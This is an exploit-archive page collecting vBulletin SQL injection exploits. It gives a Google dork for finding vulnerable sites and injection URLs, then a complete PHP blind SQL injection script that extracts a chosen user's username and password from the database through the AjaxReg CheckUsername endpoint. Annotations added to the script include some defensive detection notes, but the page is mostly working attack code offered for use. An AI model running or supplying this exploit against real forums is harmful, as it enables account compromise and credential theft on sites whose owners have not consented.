Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability
#####################################
#
# Exploit Title : Vbulletin (blog_plugin_useradmin) v4.1.12 Sql Injection Vulnerability
#
# Author : IrIsT.Ir
#
# Discovered By : Am!r
#
# Home : http://IrIsT.Ir/forum
#
# Software Link : http://www.Vbulletin.com/
#
# Security Risk : High
#
# Version : All Versions
#
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork : intext:"Powered By Vbulletin 4.1.12"
#
#####################################
#
# Expl0iTs :
#
# http://target.com/includes/blog_plugin_useradmin.php?do=usercss&u=[Sql]
#
#####################################
#
# Greats : B3HZ4D - nimaarek - Net.W0lf - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
#
# 0x0ptim0us - TaK.FaNaR - m3hdi - F () rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat -
#
# d3c0d3r - Samim.S - Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
#
#############################
vbulletin-cms-3-7-2-sql-injection-vulnerability
### http://www.mondounix.com ###
Example :
http://VULN_HOST/download.php?id=14%27
http://VULN_HOST/download.php?id=14'
### http://www.mondounix.com/exploit-database ###
vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
#!/usr/bin/php
<?
# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://lh3.googleusercontent.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# livedemo : http://www.youtube.com/watch?v=LlKaYyJxH7E
# check it : http://localhost/vBulletin/clientscript/register.js
# Prints the banner/usage text to stdout and terminates the process.
# Every path through this function ends in exit(), so callers never return
# from it; the top-level argument check relies on that.
function usage ()
{
echo
"\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
"\n[+] Author: Cold z3ro".
"\n[+] Site : http://www.hackteach.org | http://www.s3curi7y.com".
"\n[+] vandor: http://www.vbulletin.org/forum/showthread.php?t=144869".
"\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]".
"\n[+] Ex. : php 0day.php localhost /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".
"\n[+] Note. : Its a 0day exploit\n\n";
exit ();
}
# Boolean-oracle probe: asks the server whether character `$pos` of column
# `$field` for row `userid = $usid` in table `user` equals `$char`.
#
# The GET parameter value is a SQL condition rather than a username: the
# leading quote closes the string literal, `ascii(substring((SELECT ...),pos,1))`
# selects one character, and the trailing `/*` comments out whatever followed
# in the original query. `/**/` replaces every space so the injected text
# contains no whitespace at all.
#
# Defensive notes:
#   - Rules that look for `SELECT`, `substring(` or `ascii(` in this endpoint's
#     parameter must normalise SQL comments to whitespace first, otherwise the
#     `/**/` spacing slips past naive pattern matching.
#   - The oracle is only the response text ('Invalid'); the actual defect is
#     the unparameterised username lookup behind `do=CheckUsername`.
#   - `eregi()` was deprecated in PHP 5.3 and removed in 7.0, so this script
#     only runs on legacy interpreters.
#   - The literal `¶m=` looks mis-encoded (HTML-entity collapse) in this copy;
#     a signature should not depend on that exact byte sequence.
#
# Returns true when the response (headers + body, because CURLOPT_HEADER is 1
# and the output is captured via the output buffer) contains 'Invalid'
# case-insensitively, false otherwise.
function check ($hostname, $path, $field, $pos, $usid, $char)
{
# overwrite the parameter with its code point; the comparison is numeric
$char = ord ($char);
$inj = 'ajax.php?do=CheckUsername¶m=';
$inj.= "admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
$culr = $hostname.$path.$inj;
$curl = curl_init();
curl_setopt ($curl, CURLOPT_URL, $culr );
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_VERBOSE, 0);
# CURLOPT_RETURNTRANSFER is not set, so curl_exec() prints the response;
# the output buffer captures it instead of letting it reach stdout.
ob_start();
curl_exec ($curl);
curl_close ($curl);
$con = ob_get_contents();
ob_end_clean();
if(eregi('Invalid',$con))
return true;
else
return false;
}
# Recovers the value of column `$field` one character at a time, using
# check() as the truth oracle and `$key` as the candidate alphabet.
#
# For the current `$pos` it tries each character of `$key` in order. On a hit
# it echoes the character, restarts the alphabet (`$chr = -1`, so the trailing
# `$chr++` brings it back to 0) and advances `$pos`. The loop terminates when
# a full pass over `$key` yields no hit — either the end of the value or a
# character outside the alphabet — so output silently stops there.
#
# Cost is up to strlen($key) requests per recovered character, all to the
# same endpoint from one client in quick succession; that request volume is
# the easiest thing for a WAF rule or access-log review to key on.
#
# `$field` is spliced verbatim into the query ("username" / "password" at the
# call sites); what the `password` column holds in the target schema is not
# shown here.
function brutechar ($hostname, $path, $field, $usid, $key)
{
$pos = 1;
$chr = 0;
while ($chr < strlen ($key))
{
if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
}
# --- entry point ------------------------------------------------------------
# Requires exactly four argv entries (script, hostname, path, userid); any
# other count prints usage and exits. Because the count must be exactly 4,
# `$argv[4]` is never set, so `$key` always falls back to the default
# alphabet below (on PHP 8 the read of the missing index also emits a warning).
if (count ($argv) != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$usid = $argv [3];
$key = $argv [4];
if (empty ($key))
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
# Two oracle runs against the same userid: the `username` column, then the
# `password` column. Each character costs up to strlen($key) HTTP requests.
echo "[+] Username: ";
brutechar ($hostname, $path, "username", $usid, $key);
echo "\n[+] Password: ";
brutechar ($hostname, $path, "password", $usid, $key);
echo "\n[+] Done..";
echo "\n[+] It's not fake, its real.";
# word to 1337day.com, stop scaming me
?>